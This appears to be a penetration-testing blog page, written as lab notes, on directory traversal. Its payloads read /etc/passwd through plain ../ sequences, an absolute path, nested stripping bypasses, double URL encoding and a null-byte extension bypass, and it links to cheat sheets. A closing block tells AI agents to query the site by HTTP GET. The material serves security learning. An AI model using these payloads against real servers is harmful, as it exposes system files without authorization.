# Directory Traversal vulnerability ## Directory Traversal Vulnerability Directory traversal or Path Traversal is an HTTP attack that allows attackers to access restricted directories and execute commands outside of the web server’s root directory. **difference between absolute path and relative path** * Absolute path ``` cd /home/kali/Desktop ``` * Relative path ``` cd Desktop ``` **Example of infected endpoint** What happen if we change en.html to any other file ??? *** ## File path traversal, simple case * Find this Get Request on BurSuite: GET /image?filename= * modify the filename parameter with value: `../../../../etc/passwd` *** ## File path traversal, traversal sequences blocked with absolute path bypass * Find this Get Request on BurSuite: GET /image?filename= * modify the filename parameter with value: `/etc/passwd` *** ## File path traversal, traversal sequences stripped non-recursively * Find this Get Request on BurSuite: GET /image?filename= * modify the filename parameter with value: `..././..././..././..././..././etc/passwd` *** ## File path traversal, traversal sequences stripped with superfluous URL-decode * Find this Get Request on BurSuite: GET /image?filename= * modify the filename parameter with value: `..%252F..%252F..%252F..%252F..%252F..%252Fetc/passwd` *** ## File path traversal, traversal sequences stripped with superfluous URL-decode * Find this Get Request on BurSuite: GET /image?filename= * modify the filename parameter with value: `/var/www/images/../../../etc/passwd` *** ## File path traversal, validation of file extension with null byte bypass * Find this Get Request on BurSuite: GET /image?filename= * modify the filename parameter with value: `../../../../etc/passwd%00.png` *** ## Cheat sheets for Path Traversal vulnerability [PayloadsAllTheThings/Directory Traversal/Intruder/deep\_traversal.txt at master · swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/deep_traversal.txt) [JahTheTrueGod/Directory-Traversal-Cheat-Sheet: Directory traversal refresher](https://github.com/JahTheTrueGod/Directory-Traversal-Cheat-Sheet) [Directory Traversal Cheat Sheet – Penetration Testing Lab](https://pentestlab.blog/2012/06/29/directory-traversal-cheat-sheet/) [Linux Path Traversal Cheatsheet](https://gist.github.com/SleepyLctl/63a2da730a3d5abce5013f0f510b1fe2) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xk3rypton.gitbook.io/0xk3rypt0n-blog/penetration-testing/webapp-pentest/directory-traversal-vulnerability.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.